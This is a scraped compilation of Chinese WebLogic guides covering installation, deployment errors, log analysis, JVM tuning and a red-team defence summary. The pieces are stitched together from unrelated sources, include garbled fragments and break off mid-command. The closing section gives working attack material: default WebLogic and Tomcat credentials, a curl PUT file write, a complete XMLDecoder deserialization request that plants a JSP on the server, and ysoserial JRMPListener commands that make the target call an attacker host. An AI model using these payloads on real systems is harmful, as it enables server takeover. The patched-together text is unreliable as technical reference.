weblogic-bea_wls_internal

64位weblogic11g安装部署以及常见问题解决方案目录(一) 安装 (1)在Windows 64位操作系统安装Weblogic的注意事项 (3)(二) 部署运行 (3)1. 包引入错误 (3)2.乱码现象 (3)3.mime-typeType配置问题 (4)4.应用不存在 (4)5.ClassNotFoundException: org.hibernate.hql.ast.HqlToken (4)6.weblogic部署war包action不能访问问题解决方法[There is no Action mapped fornamespace / and action name] (5)ng.StackOverflowError (5)(一)安装我们在64位的服务器上为提高性能要安装64位的weblogic。

经常在网上看到有人问，weblogic有64位的么？weblogic需要破解么？weblogic有专门的64位版本，这里安装的是weblogic11g，也就是10.3.6版本，12c的版本安装应该类似。

weblogic从bea被oracle收购后，不需要破解，就只有授权。

什么意思呢？就是说从oracle官网上下载的weblogic 就是全功能版本，不管是集群还是其他，功能没有任何限制。

但是如果要用于商业环境，必须要向oracle买license，当然可以偷偷的用，那就是盗版，侵权，有一天oracle可以告的破产……。

1、下载64位weblogic，打下这个地址：:// oracle/technetwork/middleware/ias/downloads/wls-main-097127.html，在这里可以看到除了mac os X操作系统外，其他系统的64位都是同一个版本，wls1036_generic.jar。

如下列图，weblogic的下载需要注册一个oracle官网的帐号。

2、下载64位JDK，我们下载的文件wls1036_generic.jar文件里面不包括JDK，如有可能, 请尽量在Windows/Linux平台下使用JRockit虚拟机，下载地址：:// oracle/technetwork/middleware/jrockit/downloads/index.html。

weblogic详解⼀、简介WebLogic是美国公司出品的⼀个application server，确切的说是⼀个基于JAVAEE的中间件，WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和应⽤的应⽤服务器。

将Java的动态功能和Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。

WebLogic是美商的主要产品之⼀，系并购BEA得来。

是商业市场上主要的Java（J2EE）应⽤服务器软件（application server）之⼀，是世界上第⼀个成功商业化的J2EE应⽤服务器, 已推出到12c(12.1.3) 版。

⽽此产品也延伸出WebLogic Portal，WebLogic Integration等企业⽤的中间件（但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包），以及OEPE(Oracle Enterprise Pack for Eclipse)开发⼯具。

（来⾃百度百科）⼆、优点WebLogic Server具有开发和部署关键任务电⼦商务Web应⽤系统所需的多种特⾊和优势。

标准对业内多种标准的全⾯⽀持，包括EJB、JSP、Servlet、JMS、JDBC、XML（标准通⽤标记语⾔的⼦集）和WML，使Web应⽤系统的实施更为简单，并且保护了投资，同时也使基于标准的解决⽅案的开发更加简便。

可扩展性WebLogic Server以其⾼扩展的架构体系闻名于业内，包括客户机连接的共享、资源pooling以及动态⽹页和EJB组件群集。

快速开发凭借对EJB和JSP的⽀持，以及WebLogic Server 的Servlet组件架构体系，可加速投放市场速度。

这些开放性标准与WebGain Studio 配合时，可简化开发，并可发挥已有的技能，迅速部署应⽤系统。

三、和其他服务器区别tomcat （免费）Tomcat只能算Web Container，是官⽅指定的JSP&Servlet容器。

ClassCastException 错误解析现在Java编程中经常碰到ClassCastException 错误，ClassCastException 是 JVM 在检测到两个类型间的转换不兼容时引发的运行时异常。

此类错误通常会终止用户请求。

本模式试图为您提供了解和排除 ClassCastException 错误最常见成因的一些基本要素。

为什么发生此问题?在执行几乎任何子系统(web 容器、EJB、JCA、群集等)的应用程序代码或 WebLogic Server 代码内均可能发生 ClassCastException。

通过转换，可以指示 Java 编译器将给定类型的变量作为另一种变量来处理。

对基础类型和用户定义类型都可以进行转换。

Java 语言规范定义了允许的转换，其中的大多数可在编译时进行验证。

不过，某些转换还需要运行时验证。

如果在此运行时验证过程中检测到不兼容，JVM 就会引发 ClassCastException。

假设有一个 S 类型的对象，我们想把它转换为 T 类型。

S s;…T t = (T) s;如果存在以下情况，上述转换就可能引发 ClassCastException S 与 T 不兼容。

规范规定：“当应用程序代码尝试将某一对象转换为某一子类时，如果该对象并非该子类的实例，JVM 就会抛出ClassCastException。

”以下是一个示例代码，执行该代码时将会引发此类错误：public class TestCCE { public static void main(String args[]) {Object obj = new Object();String s = (String) obj;}}S 类型和 T 类型兼容，但加载时使用了不同的 ClassLoader。

第二个原因实际上是这种错误最常见的原因。

这种情况在诊断上有相当的难度，而且需要对 Java 类加载以及 WebLogic 类加载体系结构方面的基础知识有一定程度的了解。

1Weblogic9.2 在linux下启动很慢打开setDomainEnv.sh 增加-Djava.security.egd=file:/dev/zero修改参数为JAVA_OPTIONS="${JAVA_OPTIONS} -Djava.security.egd=file:/dev/zero"2Windows x64 jrockit 启动3000M 报OutOfMemoryng.OutOfMemoryError: class allocation, 153359080 loaded, 154140672 footprint JVM@check_alloc(src/jvm/model/classload/classalloc.c:118). 19416 bytes通过修改启动内存，设置4G以上3后台日志出现以下报错User <anonymous> does not have permission on weblogic.management.home to perform lookupoperation1、网上找到的解决方案是：打开weblogic控制台，点击你部署工程的那个domain，在右边主页的下面有一个“View Domain-wide Security Settings”连接，点开它，看看复选框“Anonymous Admin Lookup Enabled”前面是没选的，把它勾上。

2、使用了1中的解决方案还是报这个错误，经过高手提醒后发现原因：如果一个weblogic.xml中包含以下的内容：<container-descriptor><prefer-web-inf-classes>true</prefer-web-inf-classes></container-descriptor>这个配置的意思是使weblogic优先加载应用WEB-INF/lib下面的jar包。

weblogic基本⽬录介绍,位数查看，启动与发布项⽬,修改JVM参数,设置项⽬为默认项⽬ 这⾥的基本⽬录%base%表⽰安装⽬录，如我的⽬录为:E:/weblogic就是%base%1.weblogic⽬录介绍 weblogic主要的⽬录介绍:1.⽇志⽬录: 每个domain(域)都有⾃⼰的⽇志⽬录，⼀般启动⽇志是AdmiServer.log,存放位置在:%base%\user_projects\domains\base_domain\servers\AdminServer\logs，如下:2.项⽬发布⽬录: 每个域也都有⾃⼰的项⽬发布⽬录。

存放位置在:%base%\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_user,例如:3.JSP编译之后的⽬录:(我们需要知道weblogic编译JSP依赖⾃⼰的lib库，所以在编译之后的class⽂件头部引⼊⾃⼰的lib，⽽tomcat也依赖于⾃⼰的lib) 存放的是JSP编译之后的⽬录,位置在:%base%\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_user\Struts\km2umq\jsp_servlet⽂件夹下⾯。

⽽且JSP不会⼀次性全部编译，是我们第⼀次访问哪个JSP编译哪个JSP(JSP的延迟编译特性确实给性能带来了不⼤不⼩的影响，第⼀次访问超慢的那种状况给⼈的感觉⾮常不好)，⽽且项⽬的根⽬录的JSP编译之后的package是默认的，然后每个⽬录对应⼀个package，例如:(1)根⽬录下的JSP: JSP内容　<%@ page pageEncoding="GBK" contentType="text/html; charset=GBK" %><%@taglib uri = "/jsp/jstl/core" prefix="c" %><c:set var="baseurl" value="${pageContext.request.contextPath}"></c:set><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Insert title here</title></head><body>"${baseurl}"</body></html> 编译之后的位置:%base%\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_user\Struts\km2umq\jsp_servlet\ 查看反编译之后的内容:package jsp_servlet;import java.io.IOException;import java.io.UnsupportedEncodingException;import javax.servlet.ServletConfig;import javax.servlet.ServletContext;import javax.servlet.ServletException;import javax.servlet.ServletRequest;import javax.servlet.ServletResponse;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import javax.servlet.http.HttpSession;import javax.servlet.jsp.JspFactory;import javax.servlet.jsp.JspWriter;import javax.servlet.jsp.PageContext;import javax.servlet.jsp.SkipPageException;import javax.servlet.jsp.tagext.JspTag;import javax.servlet.jsp.tagext.SimpleTag;import javax.servlet.jsp.tagext.Tag;import org.apache.taglibs.standard.tag.rt.core.SetTag;import weblogic.jsp.internal.jsp.JspFunctionMapper;import weblogic.jsp.internal.jsp.utils.JspRuntimeUtils;import weblogic.servlet.jsp.ByteWriter;import weblogic.servlet.jsp.DependencyInjectionHelper;import weblogic.servlet.jsp.ELHelper;import weblogic.servlet.jsp.ExpressionInterceptor;import weblogic.servlet.jsp.ExpressionInterceptor.Type;import weblogic.servlet.jsp.JspBase;import weblogic.servlet.jsp.StaleChecker;import weblogic.servlet.jsp.StaleIndicator;public final class __forwardextends JspBaseimplements StaleIndicator{private static void _releaseTags(PageContext pageContext, JspTag t){while (t != null){DependencyInjectionHelper.preDestroy(pageContext, t);if ((t instanceof Tag)){Tag tmp = (Tag)t;t = ((Tag)t).getParent();try{tmp.release();}catch (Exception localException) {}}else{t = ((SimpleTag)t).getParent();}}}public boolean _isStale(){boolean _stale = _staticIsStale((StaleChecker)getServletConfig().getServletContext());return _stale;}public static boolean _staticIsStale(StaleChecker sci){if (sci.isResourceStale("/forward.jsp", 1537094471925L, "12.2.1.3.0", "UTC")) {return true;}return false;}private ExpressionInterceptor _jsp_expressionInterceptor = JspRuntimeUtils.getNonOperExpressionInterceptor();private static boolean _WL_ENCODED_BYTES_OK = true;private static final String _WL_ORIGINAL_ENCODING = "GBK".intern();private static byte[] _getBytes(String block){try{return block.getBytes(_WL_ORIGINAL_ENCODING);}catch (UnsupportedEncodingException u){_WL_ENCODED_BYTES_OK = false;}return null;}private static String _wl_block0 = "\r\n";private static final byte[] _wl_block0Bytes = _getBytes(_wl_block0);private static String _wl_block1 = "\r\n<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n<title>Insert title here</title>\r\n</head>\r\n<body>\r private static final byte[] _wl_block1Bytes = _getBytes(_wl_block1);private static String _wl_block2 = "\"\r\n</body>\r\n</html>";private static final byte[] _wl_block2Bytes = _getBytes(_wl_block2);private static JspFunctionMapper _jspx_fnmap = JspFunctionMapper.getInstance();protected void _jspInit(){this._jsp_expressionInterceptor = JspRuntimeUtils.getExpressionInterceptor(getServletConfig());}public void _jspService(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException{ServletConfig config = getServletConfig();ServletContext application = config.getServletContext();JspTag _activeTag = null;Object page = this;PageContext pageContext = JspFactory.getDefaultFactory().getPageContext(this, request, response, null, true, 8192, true);response.setHeader("Content-Type", "text/html; charset=GBK");JspWriter out = pageContext.getOut();ByteWriter _bw = (ByteWriter)out;_bw.setInitCharacterEncoding(_WL_ORIGINAL_ENCODING, _WL_ENCODED_BYTES_OK);JspWriter _originalOut = out;HttpSession session = request.getSession(true);try{response.setContentType("text/html; charset=GBK");_bw.write(_wl_block0Bytes, _wl_block0);_bw.write(_wl_block0Bytes, _wl_block0);if (_jsp__tag0(request, response, pageContext, _activeTag, null)) {return;}_bw.write(_wl_block1Bytes, _wl_block1);out.write(this._jsp_expressionInterceptor.intercept((String)ELHelper.evaluate("${baseurl}", String.class, pageContext, null), pageContext, ExpressionInterceptor.Type.EL)); _bw.write(_wl_block2Bytes, _wl_block2);}catch (Throwable __ee){if (!(__ee instanceof SkipPageException)){while ((out != null) && (out != _originalOut)) {out = pageContext.popBody();}_releaseTags(pageContext, _activeTag);pageContext.handlePageException(__ee);}}finally{JspFactory.getDefaultFactory().releasePageContext(pageContext);}}private boolean _jsp__tag0(ServletRequest request, ServletResponse response, PageContext pageContext, JspTag activeTag, JspTag parent)throws Throwable{JspTag _activeTag = activeTag;JspWriter out = pageContext.getOut();ByteWriter _bw = (ByteWriter)out;SetTag __tag0 = null;int __result__tag0 = 0;if (__tag0 == null){__tag0 = new SetTag();DependencyInjectionHelper.inject(pageContext, __tag0);}__tag0.setPageContext(pageContext);JspRuntimeUtils.setParentForClassicTag(__tag0, parent);__tag0.setVar((String)JspRuntimeUtils.convertType("baseurl", String.class, "var"));__tag0.setValue(ELHelper.evaluate("${pageContext.request.contextPath}", Object.class, pageContext, _jspx_fnmap));_activeTag = __tag0;try{__result__tag0 = __tag0.doStartTag();if ((__result__tag0 == 0) ||(__tag0.doEndTag() == 5)){_activeTag = null;_releaseTags(pageContext, __tag0);return true;}}finally{_activeTag = __tag0.getParent();DependencyInjectionHelper.preDestroy(pageContext, __tag0);__tag0.release();}return false;}}(2)⽬录下的JSP，⼀个⽬录相当于⼀个package:编译之后的位置:查看你编译之后的头部内容:4.存放lib的⽬录: 存放⼀些公共项⽬使⽤的lib，存放位置在%base%\user_projects\domains\base_domain\lib,如下:5.weblogic⾃带的lib，类似于tomcat的lib⽬录，是weblogic⾃⼰启动所需要的包，⼀般也是造成冲突包的位置: 存放位置在:%base%\wlserver\modules6.缓存⽬录: 有时候缓存造成发布问题，所以我每次除了清掉缓存⽬录，还要清掉logs⽬录和项⽬tmp⽬录，也就是我每次启动项⽬都清掉下⾯三个⽬录,每次启动都会重新⽣成下⾯三个⽬录:2.weblogic位数查看 在weblogic安装⽬录下wlserver\server\native\win⽬录下根据⽬录即可查看，例如我的64位的:3.weblogic启动 weblogic启动的程序是在%base%\user_projects\domains\base_domain\startWebLogic.cmd (其内部调⽤了%base%\\user_projects\domains\base_domain\bin⽬录下的startWebLogic.cmd)，源码如下:@ECHO OFF@REM WARNING: This file is created by the Configuration Wizard.@REM Any changes to this script may be lost when adding extensions to this configuration.SETLOCALset DOMAIN_HOME=E:\weblogic\user_projects\domains\base_domaincall "%DOMAIN_HOME%\bin\startWebLogic.cmd" %*ENDLOCAL 双击之后启动即可，启动可以访问登陆页⾯。

Weblogic部署安装手册1、点击下载好的weblogic安装包（exe的安装包），这里以weblogic7为例。

整个安装过程没有难度，安装向导操作就行。

参考链接（/view/a0ba32687e21af45b307a8f8.html）2、启动weblogic服务。

点击“开始”—“程序”如下图2.1；等服务自动启动后，会弹出2.2的图。

（2.1）（2.2）3、点击2.2图中的“Administrator Console”会出现下面的3.1画面（3.1）4、这时我们可以在控制台界面进行需要的配置。

默认情况下weblogic 是不开启snmp 并且默认端口为161如果要开启weblogic的snmp ，请勾选enabled并建议将端口设为1611，重启weblogic服务，通过netstat –na查看所设置的1611端口是否启动。

附件1：weblogic8的snmp配置界面保存后重启webloic 服务附件2：Weblogic9的snmp配置界面要对其进行编辑需要解开编辑锁左边如下图所示：编辑保存后出现点击activate changes 使改变生效需要重启weblogic 服务器附件3：weblogic 10的snmp配置界面Administrator consle登陆后将会出现选择snmp点击wl_server进入默认snmp 没有启动勾选enbabled保存后点击activate Changes注意weblogic 7，8，9 启动snmp 或改变端口是必须需要重启weblogic severWeblogic 10 是不需要的重新启动。

2019HW行动防守总结原创： 瓦都剋从五月19日到六月底一直在参与HW行动，第一次参与从甲方角度的攻防对抗的团队当中，总体来说感触很大，谨此记录下。

0x00 前言首先强调下，下文所有的思路均是"因地制宜"，根据客户业务实际情况开展。

这次HW是跟某国企合作一块进行安全防御，之前一直是做的乙方的安全服务，第一次切换到防护角色。

首先，整个项目分为两个阶段：1. 护网前2. 护网中0x01 护网前护网前的工作相当重要，国企的安全工作想必各位都有所了解这里就不多说了，如何在这么多的时间内尽量做到全面安全覆盖实在是太考验防守团队了。

前期的准备工作主要分为两个部分：1、自检2、加固自检是最快发现问题的手段，本次项目我们负责的是云平台安全，云主机总数量达14000多台，任务还是蛮重的。

1.1 自检主要分为外网渗透测试和内网渗透测试两部分，外网和内网渗透测试还不一样，外网需要结合客户相关业务来，比如政企客户你使用WordPress、Drupal的payload去打，不能说百分之百没有，但是成功的概率相当低，要有针对性去测试，因为时间不允许去这么做。

1.1.1 外网渗透测试外网不是我们的重点，根据实际情况主要关注那些能直接获取主机权限的漏洞和泄漏大量数据的漏洞即可，比如：弱口令：数据库、SSH、RDP、后台命令执行：Solr、Jenkins、Weblogic、Struts2、RMI、JBoss、Tomcat、Spring、ActiveMQ、Zabbix文件操作：文件上传、文件读取未授权访问：Redis、Hadoop、Docker、K8S1.1.2 内网渗透测试内网渗透和外网渗透区别很大，因为外网不仅有我们，还有其他合作伙伴，各种WAF、防火墙、APT、IDS、IPS、以及办公网的EDR、杀毒什么的各种安全设备一顿操作，所以我们此次的重心就是在内网云平台中，我们的靶标当然也在内网云平台中。

由于内网云平台有很多微服务集群，所以根据这个特性，主要分以下几个步骤：1、资产发现因为云平台都是在专有云上，所以写个脚本爬了下资产就可以全部获取到了。

Weblogic日志中的报错第一
注：这个错误发生了好几次，是跟自动仓储相关的，使用的是Flex的消息推送机制导致的，原因待查。

原因分析
这个原因主要是请求重复提交。

第二
原因分析
造成这种stuck线程超时的主要原因是这个线程个活动的时间太长了，远远超过了weblogic 中设置的600秒得时间。

修改weblogic的默认时间不是解决问题的根本。

根本还要从代码的执行效率上下功夫。

第三
了浏览器，导致服务器端处理完报这个错误
原因分析
错误原因：就是server没有在默认的时间把http请求发送完成，导致超时。

解决方法：重新设置CompleteMessageTimeout的时间，默认是60秒。

第四
第五
第六
注：质保书查询里报的异常，待查
第七
注：这个错误报了几次，应该是“物料备注信息查询”业务的SQL语句太慢导致线程挂起600秒仍未查询出数据导致的，需要将相应的SQL做一些优化（另外可以将600调大，除非SQL无法优化，否则不建议）。

原因分析
解决这个问题方法同上边第二个问题一样。

第八
注：TransferStgVO对象未实现serializable接口，导致不能放到Session中，待确定。

第九
注：数据库连接池报的问题，应该是连不上数据库导致的
原因分析
这个问题应该是连接数据库时候出现问题造成的。

建议检查weblogic这台机器和数据库之间的网络连接情况。

除1、2、3、7、9外，其他错误属于业务处理错误，不太可能影响打开文件数，并且比较容易通过修改程序解决。

§1Weblogic日志分析BEA公司是weblogic的厂商，他们做的日志比我们更专业，我非常肯定他们的分析。

在这里，我就不重复BEA公司对肇庆电网营销系统的再分析了，只是从开发的角度，对一些问题做一点补充。

§1.1BEA-101083BEA的分析非常正确，关于解决方法有一点补充。

这个也可能是网络的原因导致的，因此建议对于出现慢的地区的网络进行检查，确保网络有足够的带宽与速度。

§1.2BEA-101017补充一点，这可能是程序内部的代码不优化，导致有大量数据产生，从日志来看，可能下面这些组件需要优化：ponent.ar.cmp_ar_servicelocationponent.msflow.cmp_ms_ex_flow_getoutponent.aparchive.cmp_ag_meterassetponent.chg.cmp_chg_arrear_queryponent.aparchive.cmp_ag_servicelocationponent.flow.cmp_flow_worklistponent.chg.cmp_chg_bank_chgmonth日志分析1、日志中BEA相关打印信息类汇总 (3)2、各BEA代码分类明细 (3)3、BEA代号分析 (5)3.1、错误类代码分析 (5)3.2.Debug类分析 (9)3.3.Alert类分析 (10)3.4.Waining类分析 (11)4、BEA代码段分析 (12)5、日志总体分析 (17)说明：日志时间段：May 15, 2007 9:02:37 AM CST to May 15, 2007 3:42:03 PM CSTServer :weblogic_a2logname weblogic_a2.log time:2007-5-15 15:42 size:27,275,777K以下为针对日志中与weblogic相关信息进行分析，特别是大量中间件信息与BEA相关代码进行统计及打印信息及特点进行描述。

Weblogic常见报错以及解决⽅法[转载]Weblogic常见报错以及解决⽅法[转载]2020-09-13 09:55:22 4109 收藏 11⽂章标签：前⾔：Oracle WebLogic中间件在⽹站部署过程中经常会使⽤到。

该产品系列的核⼼是Oracle WebLogic服务器，它是⼀个功能强⼤和可扩展的Java EE服务器。

今天整理了在运维过程中经常会遇到的各种报错以及解决⽅法，纯技术⼲货，希望能够对正在学习weblogic过程中的您提供帮助。

weblogic有两种部署⽅式，单点模式和集群模式，单点模式直接创建⼀个域，在控制台进⾏程序部署即可；⽽集群模式分为admin（管理）节点和Managed（被管理）节点，管理节点通过控制台对被管节点进⾏管理，程序部署在被管节点的集群上。

不论是单点模式，还是集群模式，常见的报错基本⼀致。

基本概念Domain ：域是作为单元进⾏管理的⼀组相关的 WebLogic Server 资源。

⼀个域包含⼀个或多个 WebLogic Server 实例，这些实例可以是集群实例、⾮群集实例，或者是集群与⾮群集实例的组合。

⼀个域可以包含多个集群。

域还包含部署在域中的应⽤程序组件、此域中的这些应⽤程序组件和服务器实例所需的资源和服务。

应⽤程序和服务器实例使⽤的资源和服务⽰例包括计算机定义、可选⽹络通道、连接器和启动类。

Domain 中包含⼀个特殊的 WebLogic 服务器实例，叫做 Administration Server，这是我们配置管理Domain中所有资源的核⼼。

通常，我们称加⼊Domain中的其他实例为 Managed Server，所有的Web应⽤、EJB、Web Services和其他资源都部署在这些服务器上。

Administration Server ：管理服务器是控制整个域配置的中⼼操作节点，管理服务器维护着整个域的配置并将配置分配到每个被管理服务器 Managed Server 中。

weblogic运维时经常遇到的问题和常⽤的配置希望这篇能把weblogic运维时经常遇到的问题、常⽤的配置汇总到⼀起。

1、配置jvm参数：⼀般在domain启动过程中会看到以下启动的⽇志信息，如下图所⽰：图中红⾊⽅框部分为启动weblogic domain的命令。

其中包括了jvm参数以及classpath信息。

【注意】java -client是由于之前建⽴的domain是开发模式的。

⽣产模式的话，这⾥执⾏的是java -server。

⾄于-client与-server的区别，⼤家去google下吧，这⾥不介绍了。

那如何修改这个配置呢？找到setDomainEnv.cmd⽂件(linux下⾯就是setDomainEnv.sh了)，位置为：weblogic11\user_projects\domains\example\bin\setDomainEnv.cmd修改⽂件中的MEM_ARGS部分，相关参数配置如下：Java代码1. call "%WL_HOME%\common\bin\commEnv.cmd"2.3. set WLS_HOME=%WL_HOME%\server4.5. if "%JAVA_VENDOR%"=="Sun" (6. set WLS_MEM_ARGS_64BIT=-Xms256m -Xmx512m7. set WLS_MEM_ARGS_32BIT=-Xms256m -Xmx512m8. ) else (9. set WLS_MEM_ARGS_64BIT=-Xms512m -Xmx512m10. set WLS_MEM_ARGS_32BIT=-Xms512m -Xmx512m11. )12.13. set MEM_ARGS_64BIT=%WLS_MEM_ARGS_64BIT%14.15. set MEM_ARGS_32BIT=%WLS_MEM_ARGS_32BIT%16.17. if "%JAVA_USE_64BIT%"=="true" (18. set MEM_ARGS=%MEM_ARGS_64BIT%19. ) else (20. set MEM_ARGS=%MEM_ARGS_32BIT%21. )22.23. set MEM_PERM_SIZE_64BIT=-XX:PermSize=128m24.25. set MEM_PERM_SIZE_32BIT=-XX:PermSize=48m26.27. if "%JAVA_USE_64BIT%"=="true" (28. set MEM_PERM_SIZE=%MEM_PERM_SIZE_64BIT%29. ) else (30. set MEM_PERM_SIZE=%MEM_PERM_SIZE_32BIT%31. )32.33. set MEM_MAX_PERM_SIZE_64BIT=-XX:MaxPermSize=256m34.35. set MEM_MAX_PERM_SIZE_32BIT=-XX:MaxPermSize=128m36.37. if "%JAVA_USE_64BIT%"=="true" (38. set MEM_MAX_PERM_SIZE=%MEM_MAX_PERM_SIZE_64BIT%39. ) else (40. set MEM_MAX_PERM_SIZE=%MEM_MAX_PERM_SIZE_32BIT%41. )42. if "%JAVA_VENDOR%"=="Sun" (43. if "%PRODUCTION_MODE%"=="" (44. set MEM_DEV_ARGS=-XX:CompileThreshold=8000 %MEM_PERM_SIZE%45. )46. )47.48. @REM Had to have a separate test here BECAUSE of immediate variable expansion on windows49.50. if "%JAVA_VENDOR%"=="Sun" (51. set MEM_ARGS=%MEM_ARGS% %MEM_DEV_ARGS% %MEM_MAX_PERM_SIZE%52. )53.54. if "%JAVA_VENDOR%"=="HP" (55. set MEM_ARGS=%MEM_ARGS% %MEM_MAX_PERM_SIZE%56. )57.58. if "%JAVA_VENDOR%"=="Apple" (59. set MEM_ARGS=%MEM_ARGS% %MEM_MAX_PERM_SIZE%60. )61.62. @REM IF USER_MEM_ARGS the environment variable is set, use it to override ALL MEM_ARGS values63.64. if NOT "%USER_MEM_ARGS%"=="" (65. set MEM_ARGS=%USER_MEM_ARGS%66. )主要就是修改-Xms、-Xmx、-XX:PermSize、-XX:MaxPermSize的参数（视具体硬件、JVM负载情况进⾏修改）。

Weblogic内存溢出及常用参数配置一、WebLogic内存溢出最近访问量门户访问量突然增大，总是内存溢出，频繁宕机，调整了很多参数没起作用，偶然发现Weblogic域在不断增大，罪魁祸首竟然是Weblogic的诊断文件，也是造成Weblogic内存溢出的主要原因。

当Weblogic启动时就加载了每个Server上的诊断文件，占用了大部分内存分配，用户访问量越大这个文件也随之越大，将他删除后重新启动服务，八个Server竟然也只用了6分钟，部署项目也只需7，8分钟，一直平稳运行，再无内存溢出现象。

该文件地址：/bea/user_projects/domains/{domain_name}/servers/{Server_name}/data/s tore/diagnostics/*.DAT（注：AdminServer下该诊断文件为1M左右正常）但是该文件还会继续生成增大，我们的域中并没有配置相关启动诊断文件的设置，Bea售后也无法解释，但可以通过尝试增加启动参数(ui.disableInstrumentation=true)来控制该诊断文件的增长,在/bea/user_projects/domains/{domain_name}/bin/startWebLogic.sh中：if [ "${WLS_REDIRECT_LOG}" = "" ] ; thenecho "Starting WLS with line:"echo "${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} ${JAVA_OPTIONS} ui.disableInstrumentation=true =${S ERVER_NAME}-Djava.security.policy=${WL_HOME}/server/lib/weblogic.policy ${PROXY _SETTINGS} ${SERVER_CLASS}"${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} ${JAVA_OPTIONS}ui.disableInstrumentation=true =${SE RVER_NAME}-Djava.security.policy=${WL_HOME}/server/lib/weblogic.policy ${PROXY_SETTINGS} ${SERVER_CLASS}elseecho "Redirecting output from WLS window to ${WLS_REDIRECT_LOG}"${JAVA_HOME}/bin/java ${JAVA_VM} ${MEM_ARGS} ${JAVA_OPTIONS}ui.disableInstrumentation=true =${SE RVER_NAME}-Djava.security.policy=${WL_HOME}/server/lib/weblogic.policy ${PROXY_SETTINGS} ${SERVER_CLASS} >"${WLS_REDIRECT_LOG}" 2>&1该参数控制netui的诊断文件的生成。

Weblogic 部署在windows和linux的问题总结1Weblogic 11在windows下部署SSH项目问题1.1报错：web.xml节点配置有注释1.1.1报错原因：这个web.xml里面的<param-value> 节点有注释多了这个<!--classpath*:/sso/*.xml -->注释<context-param><param-name>contextConfigLocation</param-name><param-value>classpath:/applicationContext.xml<!-- classpath*:/sso/*.xml --></param-value></context-param>1.1.2报错现象：正在加载ADS Framework 初始化配置，请稍候......<2012-7-10 下午12时06分47秒CST> <Warning> <HTTP> <BEA-101162> <User defined listener com.augurit.ads.fw.listener.AdsFrameworkInitCheckListener failed: ng.IllegalStateException: applicaitonContext属性未注入, 请在applicationContext.xml中定义SpringContextHolder..ng.IllegalStateException: applicaitonContext属性未注入, 请在applicationContext.xml中定义SpringContextHolder.at org.springside.modules.utils.AssertUtils.state(AssertUtils.java:426)atorg.springside.modules.utils.spring.SpringContextHolder.assertContextInjected(SpringContextHol der.java:87)atorg.springside.modules.utils.spring.SpringContextHolder.getBean(SpringContextHolder.java:48) atcom.augurit.ads.fw.listener.AdsFrameworkInitCheckListener.checkSysConfig(AdsFrameworkInitCheckListener.java:35)atcom.augurit.ads.fw.listener.AdsFrameworkInitCheckListener.contextInitialized(AdsFrameworkIni tCheckListener.java:27)Truncated. see log file for complete stacktrace><2012-7-10 下午12时06分47秒CST> <Error> <Deployer> <BEA-149231> <Unable to set the activation state to true for the application '_appsdir_rmls_dir'.weblogic.application.ModuleException:at weblogic.servlet.internal.WebAppModule.startContexts(WebAppModule.java:1510)at weblogic.servlet.internal.WebAppModule.start(WebAppModule.java:482)atweblogic.application.internal.flow.ModuleStateDriver$3.next(ModuleStateDriver.java:425) at weblogic.application.utils.StateMachineDriver.nextState(StateMachineDriver.java:52) at weblogic.application.internal.flow.ModuleStateDriver.start(ModuleStateDriver.java:119) Truncated. see log file for complete stacktraceCaused By: ng.IllegalStateException: applicaitonContext属性未注入, 请在applicationContext.xml中定义SpringContextHolder.at org.springside.modules.utils.AssertUtils.state(AssertUtils.java:426)atorg.springside.modules.utils.spring.SpringContextHolder.assertContextInjected(SpringContextHol der.java:87)atorg.springside.modules.utils.spring.SpringContextHolder.getBean(SpringContextHolder.java:48) atcom.augurit.ads.fw.listener.AdsFrameworkInitCheckListener.checkSysConfig(AdsFrameworkInitC heckListener.java:35)atcom.augurit.ads.fw.listener.AdsFrameworkInitCheckListener.contextInitialized(AdsFrameworkIni tCheckListener.java:27)Truncated. see log file for complete stacktrace>1.1.3解决办法：这个问题是因为加载不了applicaitonContext.xml文件：检查web.xml文件，网上资料说部署在weblogic的项目不支持通配符的写法的，引入多少个配置文件就要写多少个。

⼀些中间件测试常见步骤周末陪陪家⼈记录下⼀些中间件测试常见步骤Tomcat开始安装ubuntu，⽤sudo passwd root设置root密码，运⾏p神的时⽤root运⾏成功.Tomcat7弱⼝令上传rarsudo docker ps #查看启动的dockerroot/roottomcat/tomcatadmin adminadmin 123456Tomcat5-9 PUT写⽂件curl -X PUT http://127.0.0.1:port/test.jsp/ -d @- < test.jspWeblogic弱⼝令常见弱⼝令weblogic weblogic 或Oracle@123system systemportaladmin portaladminguest guest部署-安装-上载⽂件ma.war(ma.jsp打包为ma.zip改名为ma.war)访问127.0.0.1:7001/ma/ma.jsp 例⼦的⽬录命名为maWeblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: ip:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638<soapenv:Envelope xmlns:soapenv="/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<% out.print("test"); %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>Weblogic 10.3.6.0 && 12.1.3.0 && 12.2.1.2 && 12.2.1.3攻击者使被攻击主机请求JRMPListener主机(恶意payload)，并执⾏利⽤：在JRMPListener主机上运⾏以下命令：wget https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jarjava -cp ysoserial.jar ysoserial.exploit.JRMPListener [监听端⼝] CommonsCollections1 [执⾏命令]例⼦：java -cp ysoserial.jar ysoserial.exploit.JRMPListener 